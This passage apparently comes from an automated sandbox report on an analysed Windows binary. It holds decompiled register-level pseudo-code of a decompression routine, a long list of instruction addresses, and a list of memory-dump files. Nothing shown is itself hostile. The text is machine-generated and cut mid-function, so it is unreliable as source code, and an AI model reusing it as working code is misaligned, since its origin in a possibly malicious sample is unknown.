												__esi[0x26ea] = __edx;
												__eax = E004067B2( *((intOrPtr*)(__ebp + 8)));
												__edx = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edx - __ecx;
												 *(__ebp - 0x30) = __edx;
												if(__edx >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edx;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edx;
													__eax = __ecx - __edx - 1;
												}
												__edi = __esi[0x26e8];
												 *(__ebp - 0x2c) = __eax;
												__eflags = __edx - __edi;
												if(__edx == __edi) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __edx - __ecx;
													if(__eflags != 0) {
														 *(__ebp - 0x30) = __edx;
														if(__eflags >= 0) {
															__edi = __edi - __edx;
															__eflags = __edi;
															__eax = __edi;
														} else {
															__ecx = __ecx - __edx;
															__eax = __ecx;
														}
														 *(__ebp - 0x2c) = __eax;
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L48;
												}
											}
											L33:
											__eax = __esi[0x26e9];
											__edi =  &(__esi[0x6e8]);
											__eflags = __eax - __edi;
											if(__eax == __edi) {
												goto L38;
											}
											L34:
											__edx = __edi;
											__eflags = __edx - __eax;
											 *(__ebp - 0x30) = __edx;
											if(__edx >= __eax) {
												__ecx = __ecx - __edx;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edx;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											 *(__ebp - 0x2c) = __eax;
											if(__eax != 0) {
												goto L48;
											} else {
												goto L38;
											}
										case 0xb:
											goto L56;
										case 0xc:
											L60:
											__esi[1] = __esi[1] >> 0xa;
											__eax = (__esi[1] >> 0xa) + 4;
											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
												goto L68;
											}
											goto L61;
										case 0xd:
											while(1) {
												L93:
												__eax = __esi[1];
												__ecx = __esi[2];
												__edx = __eax;
												__eax = __eax & 0x0000001f;
												__edx = __edx >> 5;
												__eax = __edx + __eax + 0x102;
												__eflags = __esi[2] - __eax;
												if(__esi[2] >= __eax) {
													break;
												}
												L73:
												__eax = __esi[0x143];
												while(1) {
													L76:
													__eflags = __ebx - __eax;
													if(__ebx >= __eax) {
														break;
													}
													L74:
													__eflags =  *(__ebp - 0x34);
													if( *(__ebp - 0x34) == 0) {
														goto L182;
													}
													L75:
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
													__ecx = __ebx;
													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
													__ebx = __ebx + 8;
													__eflags = __ebx;
												}
												L77:
												__eax =  *(0x409340 + __eax * 2) & 0x0000ffff;
												__eax = __eax &  *(__ebp - 0x40);
												__ecx = __esi[0x144];
												__eax = __esi[0x144] + __eax * 4;
												__edx =  *(__eax + 1) & 0x000000ff;
												__eax =  *(__eax + 2) & 0x0000ffff;
												__eflags = __eax - 0x10;
												 *(__ebp - 0x14) = __eax;
												if(__eax >= 0x10) {
													L79:
													__eflags = __eax - 0x12;
													if(__eax != 0x12) {
														__eax = __eax + 0xfffffff2;
														 *(__ebp - 8) = 3;
													} else {
														_push(7);
														 *(__ebp - 8) = 0xb;
														_pop(__eax);
													}
													while(1) {
														L84:
														__ecx = __eax + __edx;
														__eflags = __ebx - __eax + __edx;
														if(__ebx >= __eax + __edx) {
															break;
														}
														L82:
														__eflags =  *(__ebp - 0x34);
														if( *(__ebp - 0x34) == 0) {
															goto L182;
														}
														L83:
														__ecx =  *(__ebp - 0x38);
														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
														__ecx = __ebx;
														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
														__ebx = __ebx + 8;
														__eflags = __ebx;
													}
													L85:
													__ecx = __edx;
													__ebx = __ebx - __edx;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													 *(0x409340 + __eax * 2) & 0x0000ffff =  *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
													__edx =  *(__ebp - 8);
													__ebx = __ebx - __eax;
													__edx =  *(__ebp - 8) + ( *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
													__ecx = __eax;
													__eax = __esi[1];
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													__ecx = __esi[2];
													__eax = __eax >> 5;
													__edi = __eax >> 0x00000005 & 0x0000001f;
													__eax = __eax & 0x0000001f;
													__eax = __edi + __eax + 0x102;
													__edi = __edx + __ecx;
													__eflags = __edx + __ecx - __eax;
													if(__edx + __ecx > __eax) {
														goto L9;
													}
													L86:
													__eflags =  *(__ebp - 0x14) - 0x10;
													if( *(__ebp - 0x14) != 0x10) {
														L89:
														__edi = 0;
														__eflags = 0;
														L90:
														__eax = __esi + 0xc + __ecx * 4;
														do {
															L91:
															 *__eax = __edi;
															__ecx = __ecx + 1;
															__eax = __eax + 4;
															__edx = __edx - 1;
															__eflags = __edx;
														} while (__edx != 0);
														__esi[2] = __ecx;
														continue;
													}
													L87:
													__eflags = __ecx - 1;
													if(__ecx < 1) {
														goto L9;
													}
													L88:
													__edi =  *(__esi + 8 + __ecx * 4);
													goto L90;
												}
												L78:
												__ecx = __edx;
												__ebx = __ebx - __edx;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
												__ecx = __esi[2];
												 *(__esi + 0xc + __esi[2] * 4) = __eax;
												__esi[2] = __esi[2] + 1;
											}
											L94:
											__eax = __esi[1];
											__esi[0x144] = __esi[0x144] & 0x00000000;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
											__edi = __eax;
											__eax = __eax >> 5;
											__edi = __edi & 0x0000001f;
											__ecx = 0x101;
											__eax = __eax & 0x0000001f;
											__edi = __edi + 0x101;
											__eax = __eax + 1;
											__edx = __ebp - 0xc;
											 *(__ebp - 0x14) = __eax;
											 &(__esi[0x148]) = __ebp - 4;
											 *(__ebp - 4) = 9;
											__ebp - 0x18 =  &(__esi[3]);
											 *(__ebp - 0x10) = 6;
											__eax = E0040681A( &(__esi[3]), __edi, 0x101, 0x407388, 0x4073c8, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
											__eflags =  *(__ebp - 4);
											if( *(__ebp - 4) == 0) {
												__eax = __eax | 0xffffffff;
												__eflags = __eax;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L9;
											} else {
												L97:
												__ebp - 0xc =  &(__esi[0x148]);
												__ebp - 0x10 = __ebp - 0x1c;
												__eax = __esi + 0xc + __edi * 4;
												__eax = E0040681A(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x407408, 0x407444, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
												__eflags = __eax;
												if(__eax != 0) {
													goto L9;
												}
												L98:
												__eax =  *(__ebp - 0x10);
												__eflags =  *(__ebp - 0x10);
												if( *(__ebp - 0x10) != 0) {
													L100:
													__cl =  *(__ebp - 4);
													 *__esi =  *__esi & 0x00000000;
													__eflags =  *__esi;
													__esi[4] = __al;
													__eax =  *(__ebp - 0x18);
													__esi[5] =  *(__ebp - 0x18);
													__eax =  *(__ebp - 0x1c);
													__esi[4] = __cl;
													__esi[6] =  *(__ebp - 0x1c);
													goto L101;
												}
												L99:
												__eflags = __edi - 0x101;
												if(__edi > 0x101) {
													goto L9;
												}
												goto L100;
											}
										case 0xe:
											goto L9;
										case 0xf:
											L175:
											__eax =  *(__ebp - 0x30);
											__esi[0x26ea] =  *(__ebp - 0x30);
											__eax = E004067B2( *((intOrPtr*)(__ebp + 8)));
											__ecx = __esi[0x26ea];
											__edx = __esi[0x26e9];
											__eflags = __ecx - __edx;
											 *(__ebp - 0x30) = __ecx;
											if(__ecx >= __edx) {
												__eax = __esi[0x26e8];
												__eax = __esi[0x26e8] - __ecx;
												__eflags = __eax;
											} else {
												__edx = __edx - __ecx;
												__eax = __edx - __ecx - 1;
											}
											__eflags = __ecx - __edx;
											 *(__ebp - 0x2c) = __eax;
											if(__ecx != __edx) {
												L183:
												__edi = 0;
												goto L10;
											} else {
												L179:
												__eax = __esi[0x145];
												__eflags = __eax - 8;
												 *__esi = __eax;
												if(__eax != 8) {
													L184:
													0 = 1;
													goto L10;
												}
												goto L180;
											}
									}
								}
								L181:
								goto L9;
							}
							L70:
							if( *__edi == __eax) {
								goto L72;
							}
							L71:
							__esi[2] = __esi[2] & __eax;
							 *__esi = 0xd;
							goto L93;
						}
					}
				}
				L182:
				_t443 = 0;
				_t446[0x147] =  *(_t448 - 0x40);
				_t446[0x146] = _t425;
				( *(_t448 + 8))[1] = 0;
				goto L11;
			}









                                          0x00406043
                                          0x00406043
                                          0x00406043
                                          0x00406043
                                          0x00406043
                                          0x00406047
                                          0x00000000
                                          0x00000000
                                          0x0040604d
                                          0x0040604d
                                          0x00406050
                                          0x00406053
                                          0x00406058
                                          0x0040605a
                                          0x0040605d
                                          0x00406060
                                          0x00406063
                                          0x00406063
                                          0x00406066
                                          0x00000000
                                          0x00000000
                                          0x00406068
                                          0x00406068
                                          0x0040606b
                                          0x00406070
                                          0x00406072
                                          0x00406075
                                          0x0040607b
                                          0x00405dda
                                          0x00405dda
                                          0x00405ddd
                                          0x00405de3
                                          0x00405de9
                                          0x00405df2
                                          0x00405df8
                                          0x00405dfb
                                          0x00405e02
                                          0x00405e07
                                          0x00405e0d
                                          0x00405e18
                                          0x00405e18
                                          0x00406081
                                          0x00406081
                                          0x0040608b
                                          0x00000000
                                          0x00000000
                                          0x00406091
                                          0x00406091
                                          0x00406095
                                          0x00406098
                                          0x00406098
                                          0x0040609c
                                          0x004060a2
                                          0x004060a2
                                          0x004060a5
                                          0x004060a8
                                          0x004060ae
                                          0x00000000
                                          0x00000000
                                          0x004060b0
                                          0x004060d2
                                          0x004060d2
                                          0x004060d5
                                          0x00000000
                                          0x00000000
                                          0x004060b2
                                          0x004060b6
                                          0x00000000
                                          0x00000000
                                          0x004060bc
                                          0x004060bc
                                          0x004060bf
                                          0x004060c2
                                          0x004060c7
                                          0x004060c9
                                          0x004060cc
                                          0x004060cf
                                          0x004060cf
                                          0x004060d7
                                          0x004060d7
                                          0x004060dd
                                          0x004060e0
                                          0x004060e3
                                          0x004060e3
                                          0x004060ea
                                          0x004060ee
                                          0x004060f2
                                          0x004060f5
                                          0x004060f8
                                          0x004060fe
                                          0x00406103
                                          0x00000000
                                          0x00000000
                                          0x00406105
                                          0x00406119
                                          0x00406119
                                          0x0040611d
                                          0x00000000
                                          0x00000000
                                          0x00406107
                                          0x0040610a
                                          0x0040610a
                                          0x00406111
                                          0x00406116
                                          0x00406116
                                          0x00406116
                                          0x0040611f
                                          0x0040611f
                                          0x00406122
                                          0x00406130
                                          0x00406136
                                          0x0040613b
                                          0x00406141
                                          0x00406147
                                          0x0040614d
                                          0x00406154
                                          0x00406168
                                          0x00406168
                                          0x00406737
                                          0x00406737
                                          0x00406737
                                          0x0040673c
                                          0x00000000
                                          0x00000000
                                          0x00405d74
                                          0x00405d74
                                          0x00000000
                                          0x0040636f
                                          0x0040636f
                                          0x00406373
                                          0x00406376
                                          0x00406379
                                          0x0040637c
                                          0x00000000
                                          0x00000000
                                          0x00406382
                                          0x00406382
                                          0x004063a7
                                          0x004063a7
                                          0x004063a7
                                          0x004063a9
                                          0x00000000
                                          0x00000000
                                          0x00406387
                                          0x00406387
                                          0x0040638b
                                          0x00000000
                                          0x00000000
                                          0x00406391
                                          0x00406391
                                          0x00406394
                                          0x00406397
                                          0x0040639a
                                          0x0040639c
                                          0x0040639e
                                          0x004063a1
                                          0x004063a4
                                          0x004063a4
                                          0x004063a4
                                          0x004063ab
                                          0x004063ab
                                          0x004063b3
                                          0x004063b6
                                          0x004063b9
                                          0x004063bc
                                          0x004063c0
                                          0x004063c3
                                          0x004063c5
                                          0x004063c8
                                          0x004063ca
                                          0x004063de
                                          0x004063de
                                          0x004063e1
                                          0x004063fb
                                          0x004063fb
                                          0x004063fe
                                          0x00000000
                                          0x00000000
                                          0x00406404
                                          0x00406404
                                          0x00406407
                                          0x00000000
                                          0x00000000
                                          0x0040640d
                                          0x0040640d
                                          0x00000000
                                          0x0040640d
                                          0x004063e3
                                          0x004063e6
                                          0x004063ed
                                          0x004063f0
                                          0x00000000
                                          0x004063f0
                                          0x004063cc
                                          0x004063d0
                                          0x004063d3
                                          0x00000000
                                          0x00000000
                                          0x00406418
                                          0x00406418
                                          0x0040643d
                                          0x0040643d
                                          0x0040643d
                                          0x0040643f
                                          0x00000000
                                          0x00000000
                                          0x0040641d
                                          0x0040641d
                                          0x00406421
                                          0x00000000
                                          0x00000000
                                          0x00406427
                                          0x00406427
                                          0x0040642a
                                          0x0040642d
                                          0x00406430
                                          0x00406432
                                          0x00406434
                                          0x00406437
                                          0x0040643a
                                          0x0040643a
                                          0x0040643a
                                          0x00406441
                                          0x00406449
                                          0x0040644c
                                          0x0040644f
                                          0x00406451
                                          0x00406454
                                          0x00406454
                                          0x00406456
                                          0x0040645a
                                          0x0040645d
                                          0x00406460
                                          0x00406463
                                          0x00000000
                                          0x00000000
                                          0x00406469
                                          0x00406469
                                          0x0040648e
                                          0x0040648e
                                          0x0040648e
                                          0x00406490
                                          0x00000000
                                          0x00000000
                                          0x0040646e
                                          0x0040646e
                                          0x00406472
                                          0x00000000
                                          0x00000000
                                          0x00406478
                                          0x00406478
                                          0x0040647b
                                          0x0040647e
                                          0x00406481
                                          0x00406483
                                          0x00406485
                                          0x00406488
                                          0x0040648b
                                          0x0040648b
                                          0x0040648b
                                          0x00406492
                                          0x00406492
                                          0x0040649a
                                          0x0040649d
                                          0x004064a0
                                          0x004064a3
                                          0x004064a7
                                          0x004064aa
                                          0x004064ac
                                          0x004064af
                                          0x004064b2
                                          0x004064cc
                                          0x004064cc
                                          0x004064cf
                                          0x00000000
                                          0x00000000
                                          0x004064d5
                                          0x004064d5
                                          0x004064d8
                                          0x004064df
                                          0x00000000
                                          0x004064df
                                          0x004064b4
                                          0x004064b7
                                          0x004064be
                                          0x004064c1
                                          0x00000000
                                          0x00000000
                                          0x004064e7
                                          0x004064e7
                                          0x0040650c
                                          0x0040650c
                                          0x0040650c
                                          0x0040650e
                                          0x00000000
                                          0x00000000
                                          0x004064ec
                                          0x004064ec
                                          0x004064f0
                                          0x00000000
                                          0x00000000
                                          0x004064f6
                                          0x004064f6
                                          0x004064f9
                                          0x004064fc
                                          0x004064ff
                                          0x00406501
                                          0x00406503
                                          0x00406506
                                          0x00406509
                                          0x00406509
                                          0x00406509
                                          0x00406510
                                          0x00406518
                                          0x0040651b
                                          0x0040651e
                                          0x00406520
                                          0x00406523
                                          0x00406523
                                          0x00406525
                                          0x00000000
                                          0x00000000
                                          0x0040652b
                                          0x0040652b
                                          0x0040652e
                                          0x00406533
                                          0x00406535
                                          0x0040653b
                                          0x0040653d
                                          0x00406552
                                          0x00406554
                                          0x00406554
                                          0x0040653f
                                          0x00406545
                                          0x00406547
                                          0x00406549
                                          0x00406549
                                          0x00406556
                                          0x0040655a
                                          0x0040655d
                                          0x00406563
                                          0x00406563
                                          0x00406566
                                          0x00406566
                                          0x00406566
                                          0x00406568
                                          0x00000000
                                          0x00000000
                                          0x0040656e
                                          0x0040656e
                                          0x00406574
                                          0x00406576
                                          0x0040659b
                                          0x0040659e
                                          0x004065a4
                                          0x004065a9
                                          0x004065af
                                          0x004065b5
                                          0x004065b7
                                          0x004065ba
                                          0x004065c3
                                          0x004065c9
                                          0x004065c9
                                          0x004065bc
                                          0x004065be
                                          0x004065c0
                                          0x004065c0
                                          0x004065cb
                                          0x004065d1
                                          0x004065d3
                                          0x004065d6
                                          0x004065d8
                                          0x004065de
                                          0x004065e0
                                          0x004065e2
                                          0x004065e4
                                          0x004065e6
                                          0x004065e9
                                          0x004065f2
                                          0x004065f5
                                          0x004065f5
                                          0x004065eb
                                          0x004065eb
                                          0x004065ee
                                          0x004065ee
                                          0x004065e9
                                          0x004065e0
                                          0x004065f7
                                          0x004065f9
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004065f9
                                          0x00406578
                                          0x00406578
                                          0x0040657e
                                          0x00406584
                                          0x00406586
                                          0x00000000
                                          0x00000000
                                          0x00406588
                                          0x00406588
                                          0x0040658a
                                          0x0040658c
                                          0x00406595
                                          0x00406595
                                          0x0040658e
                                          0x0040658e
                                          0x00406591
                                          0x00406591
                                          0x00406597
                                          0x00406599
                                          0x00000000
                                          0x00000000
                                          0x004065ff
                                          0x004065ff
                                          0x00406604
                                          0x00406606
                                          0x00406607
                                          0x00406608
                                          0x00406609
                                          0x0040660f
                                          0x00406612
                                          0x00406615
                                          0x00406618
                                          0x0040661a
                                          0x00406620
                                          0x00406620
                                          0x00406623
                                          0x00406623
                                          0x00406623
                                          0x00406623
                                          0x0040662c
                                          0x00000000
                                          0x00000000
                                          0x00406631
                                          0x00406631
                                          0x00406634
                                          0x00406637
                                          0x00406639
                                          0x004066d0
                                          0x004066d0
                                          0x004066d3
                                          0x004066d5
                                          0x004066d6
                                          0x004066d7
                                          0x004066da
                                          0x00000000
                                          0x004066da
                                          0x0040663f
                                          0x0040663f
                                          0x00406645
                                          0x00406647
                                          0x0040666c
                                          0x0040666f
                                          0x00406675
                                          0x0040667a
                                          0x00406680
                                          0x00406686
                                          0x00406688
                                          0x0040668b
                                          0x00406694
                                          0x0040669a
                                          0x0040669a
                                          0x0040668d
                                          0x0040668f
                                          0x00406691
                                          0x00406691
                                          0x0040669c
                                          0x004066a2
                                          0x004066a4
                                          0x004066a7
                                          0x004066a9
                                          0x004066af
                                          0x004066b1
                                          0x004066b3
                                          0x004066b5
                                          0x004066b7
                                          0x004066ba
                                          0x004066c3
                                          0x004066c6
                                          0x004066c6
                                          0x004066bc
                                          0x004066bc
                                          0x004066bf
                                          0x004066bf
                                          0x004066ba
                                          0x004066b1
                                          0x004066c8
                                          0x004066ca
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004066ca
                                          0x00406649
                                          0x00406649
                                          0x0040664f
                                          0x00406655
                                          0x00406657
                                          0x00000000
                                          0x00000000
                                          0x00406659
                                          0x00406659
                                          0x0040665b
                                          0x0040665d
                                          0x00406664
                                          0x00406664
                                          0x00406666
                                          0x0040665f
                                          0x0040665f
                                          0x00406661
                                          0x00406661
                                          0x00406668
                                          0x0040666a
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004066e2
                                          0x004066e2
                                          0x004066e5
                                          0x004066e7
                                          0x004066ea
                                          0x004066ed
                                          0x004066ed
                                          0x004066ed
                                          0x004066ed
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00405d9b
                                          0x00405d7f
                                          0x00000000
                                          0x00405d85
                                          0x00405d88
                                          0x00405d92
                                          0x00405d95
                                          0x00405d98
                                          0x00000000
                                          0x00405d98
                                          0x00405d7f
                                          0x00405da3
                                          0x00405da6
                                          0x00405daa
                                          0x00405db4
                                          0x00405dbe
                                          0x00405dc1
                                          0x00405dc7
                                          0x00405efb
                                          0x00405efd
                                          0x00405f03
                                          0x00405f06
                                          0x00405f09
                                          0x00000000
                                          0x00405f09
                                          0x00405dcd
                                          0x00405dcd
                                          0x00405dce
                                          0x00405e26
                                          0x00405e26
                                          0x00405e2d
                                          0x00405ed3
                                          0x00405ed3
                                          0x00405ed8
                                          0x00405edb
                                          0x00405ee0
                                          0x00405ee3
                                          0x00405ee8
                                          0x00405eeb
                                          0x00405ef0
                                          0x00405ef3
                                          0x00405ef3
                                          0x00000000
                                          0x00405e33
                                          0x00405e33
                                          0x00405e33
                                          0x00405e33
                                          0x00405e37
                                          0x00405e37
                                          0x00405e59
                                          0x00405e5c
                                          0x00405e5e
                                          0x00405e61
                                          0x00405e66
                                          0x00405e3c
                                          0x00405e3c
                                          0x00405e41
                                          0x00405e43
                                          0x00405e45
                                          0x00405e4a
                                          0x00405e50
                                          0x00405e55
                                          0x00405e57
                                          0x00405e57
                                          0x00405e4c
                                          0x00405e4c
                                          0x00405e4c
                                          0x00405e4a
                                          0x00000000
                                          0x00405e68
                                          0x00405e95
                                          0x00405e9a
                                          0x00405e9c
                                          0x00405e9d
                                          0x00405e9f
                                          0x00405ea0
                                          0x00405ea0
                                          0x00405ea0
                                          0x00405ec8
                                          0x00405ecd
                                          0x00405ecd
                                          0x00000000
                                          0x00405ecd
                                          0x00405e66
                                          0x00405e2d
                                          0x00405dd0
                                          0x00405dd0
                                          0x00405dd1
                                          0x00405e1b
                                          0x00000000
                                          0x00405e1b
                                          0x00405dd3
                                          0x00405dd4
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00405f30
                                          0x00405f30
                                          0x00405f30
                                          0x00405f33
                                          0x00000000
                                          0x00000000
                                          0x00405f10
                                          0x00405f10
                                          0x00405f14
                                          0x00000000
                                          0x00000000
                                          0x00405f1a
                                          0x00405f1a
                                          0x00405f1d
                                          0x00405f20
                                          0x00405f25
                                          0x00405f27
                                          0x00405f2a
                                          0x00405f2d
                                          0x00405f2d
                                          0x00405f2d
                                          0x00405f35
                                          0x00405f35
                                          0x00405f38
                                          0x00405f3a
                                          0x00405f3f
                                          0x00405f42
                                          0x00405f44
                                          0x00405f47
                                          0x00000000
                                          0x00000000
                                          0x00405f4d
                                          0x00405f4d
                                          0x00405f4f
                                          0x00000000
                                          0x00000000
                                          0x00405f55
                                          0x00405f55
                                          0x00405f59
                                          0x00000000
                                          0x00000000
                                          0x00405f5f
                                          0x00405f5f
                                          0x00405f62
                                          0x00405f64
                                          0x00406002
                                          0x00406002
                                          0x00406005
                                          0x00406007
                                          0x00406007
                                          0x0040600a
                                          0x0040600d
                                          0x0040600f
                                          0x00406011
                                          0x00406013
                                          0x00406013
                                          0x0040601c
                                          0x00406021
                                          0x00406024
                                          0x00406027
                                          0x0040602a
                                          0x0040602d
                                          0x0040602d
                                          0x0040602d
                                          0x00406030
                                          0x00406036
                                          0x00406036
                                          0x0040603c
                                          0x0040603c
                                          0x0040603c
                                          0x00000000
                                          0x00406030
                                          0x00405f6a
                                          0x00405f6a
                                          0x00405f70
                                          0x00405f73
                                          0x00405f75
                                          0x00405fa0
                                          0x00405fa3
                                          0x00405fa9
                                          0x00405fae
                                          0x00405fb4
                                          0x00405fba
                                          0x00405fbc
                                          0x00405fbf
                                          0x00405fc8
                                          0x00405fce
                                          0x00405fce
                                          0x00405fc1
                                          0x00405fc3
                                          0x00405fc5
                                          0x00405fc5
                                          0x00405fd0
                                          0x00405fd6
                                          0x00405fd9
                                          0x00405fdb
                                          0x00405fdd
                                          0x00405fe3
                                          0x00405fe5
                                          0x00405fe7
                                          0x00405fea
                                          0x00405ff3
                                          0x00405ff3
                                          0x00405ff5
                                          0x00405fec
                                          0x00405fec
                                          0x00405fef
                                          0x00405fef
                                          0x00405ff7
                                          0x00405ff7
                                          0x00405fe5
                                          0x00405ffa
                                          0x00405ffc
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00405ffc
                                          0x00405f77
                                          0x00405f77
                                          0x00405f7d
                                          0x00405f83
                                          0x00405f85
                                          0x00000000
                                          0x00000000
                                          0x00405f87
                                          0x00405f87
                                          0x00405f89
                                          0x00405f8b
                                          0x00405f8e
                                          0x00405f95
                                          0x00405f95
                                          0x00405f97
                                          0x00405f90
                                          0x00405f90
                                          0x00405f92
                                          0x00405f92
                                          0x00405f99
                                          0x00405f9b
                                          0x00405f9e
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004060a2
                                          0x004060a5
                                          0x004060a8
                                          0x004060ae
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406285
                                          0x00406285
                                          0x00406285
                                          0x00406288
                                          0x0040628b
                                          0x0040628d
                                          0x00406290
                                          0x00406296
                                          0x0040629d
                                          0x0040629f
                                          0x00000000
                                          0x00000000
                                          0x00406173
                                          0x00406173
                                          0x0040619b
                                          0x0040619b
                                          0x0040619b
                                          0x0040619d
                                          0x00000000
                                          0x00000000
                                          0x0040617b
                                          0x0040617b
                                          0x0040617f
                                          0x00000000
                                          0x00000000
                                          0x00406185
                                          0x00406185
                                          0x00406188
                                          0x0040618b
                                          0x0040618e
                                          0x00406190
                                          0x00406192
                                          0x00406195
                                          0x00406198
                                          0x00406198
                                          0x00406198
                                          0x0040619f
                                          0x0040619f
                                          0x004061a7
                                          0x004061aa
                                          0x004061b0
                                          0x004061b3
                                          0x004061b7
                                          0x004061bb
                                          0x004061be
                                          0x004061c1
                                          0x004061d9
                                          0x004061d9
                                          0x004061dc
                                          0x004061ea
                                          0x004061ed
                                          0x004061de
                                          0x004061de
                                          0x004061e0
                                          0x004061e7
                                          0x004061e7
                                          0x00406216
                                          0x00406216
                                          0x00406216
                                          0x00406219
                                          0x0040621b
                                          0x00000000
                                          0x00000000
                                          0x004061f6
                                          0x004061f6
                                          0x004061fa
                                          0x00000000
                                          0x00000000
                                          0x00406200
                                          0x00406200
                                          0x00406203
                                          0x00406206
                                          0x00406209
                                          0x0040620b
                                          0x0040620d
                                          0x00406210
                                          0x00406213
                                          0x00406213
                                          0x00406213
                                          0x0040621d
                                          0x0040621d
                                          0x0040621f
                                          0x00406221
                                          0x0040622c
                                          0x0040622f
                                          0x00406232
                                          0x00406234
                                          0x00406236
                                          0x00406238
                                          0x0040623b
                                          0x0040623e
                                          0x00406243
                                          0x00406246
                                          0x00406249
                                          0x0040624c
                                          0x00406253
                                          0x00406256
                                          0x00406258
                                          0x00000000
                                          0x00000000
                                          0x0040625e
                                          0x0040625e
                                          0x00406262
                                          0x00406273
                                          0x00406273
                                          0x00406273
                                          0x00406275
                                          0x00406275
                                          0x00406279
                                          0x00406279
                                          0x00406279
                                          0x0040627b
                                          0x0040627c
                                          0x0040627f
                                          0x0040627f
                                          0x0040627f
                                          0x00406282
                                          0x00000000
                                          0x00406282
                                          0x00406264
                                          0x00406264
                                          0x00406267
                                          0x00000000
                                          0x00000000
                                          0x0040626d
                                          0x0040626d
                                          0x00000000
                                          0x0040626d
                                          0x004061c3
                                          0x004061c3
                                          0x004061c5
                                          0x004061c7
                                          0x004061ca
                                          0x004061cd
                                          0x004061d1
                                          0x004061d1
                                          0x004062a5
                                          0x004062a5
                                          0x004062a8
                                          0x004062af
                                          0x004062b3
                                          0x004062b5
                                          0x004062b8
                                          0x004062bb
                                          0x004062c0
                                          0x004062c3
                                          0x004062c5
                                          0x004062c6
                                          0x004062c9
                                          0x004062d4
                                          0x004062d7
                                          0x004062ee
                                          0x004062f3
                                          0x004062fa
                                          0x004062ff
                                          0x00406303
                                          0x00406305
                                          0x00406305
                                          0x00406305
                                          0x00406308
                                          0x0040630a
                                          0x00000000
                                          0x00406310
                                          0x00406310
                                          0x00406314
                                          0x0040631f
                                          0x00406332
                                          0x00406337
                                          0x0040633c
                                          0x0040633e
                                          0x00000000
                                          0x00000000
                                          0x00406344
                                          0x00406344
                                          0x00406347
                                          0x00406349
                                          0x00406357
                                          0x00406357
                                          0x0040635a
                                          0x0040635a
                                          0x0040635d
                                          0x00406360
                                          0x00406363
                                          0x00406366
                                          0x00406369
                                          0x0040636c
                                          0x00000000
                                          0x0040636c
                                          0x0040634b
                                          0x0040634b
                                          0x00406351
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406351
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004066f0
                                          0x004066f0
                                          0x004066f6
                                          0x004066fc
                                          0x00406701
                                          0x00406707
                                          0x0040670d
                                          0x0040670f
                                          0x00406712
                                          0x0040671b
                                          0x00406721
                                          0x00406721
                                          0x00406714
                                          0x00406716
                                          0x00406718
                                          0x00406718
                                          0x00406723
                                          0x00406725
                                          0x00406728
                                          0x00406763
                                          0x00406763
                                          0x00000000
                                          0x0040672a
                                          0x0040672a
                                          0x0040672a
                                          0x00406730
                                          0x00406733
                                          0x00406735
                                          0x0040676a
                                          0x0040676c
                                          0x00000000
                                          0x0040676c
                                          0x00000000
                                          0x00406735
                                          0x00000000
                                          0x00405d74
                                          0x00406742
                                          0x00000000
                                          0x00406742
                                          0x00406156
                                          0x00406158
                                          0x00000000
                                          0x00000000
                                          0x0040615a
                                          0x0040615a
                                          0x0040615d
                                          0x00000000
                                          0x0040615d
                                          0x004060a2
                                          0x00406063
                                          0x00406747
                                          0x0040674a
                                          0x0040674c
                                          0x00406755
                                          0x0040675b
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp Download File
